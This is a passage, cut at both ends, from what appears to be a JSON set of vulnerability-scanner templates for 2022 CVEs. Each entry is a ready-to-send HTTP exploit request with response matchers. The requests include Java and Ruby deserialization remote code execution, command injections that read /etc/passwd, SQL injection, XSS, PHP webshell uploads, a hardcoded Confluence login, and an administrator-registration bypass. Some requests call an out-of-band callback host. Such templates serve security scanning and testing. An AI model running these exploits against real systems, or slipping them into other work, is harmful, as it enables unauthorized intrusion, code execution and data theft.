Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 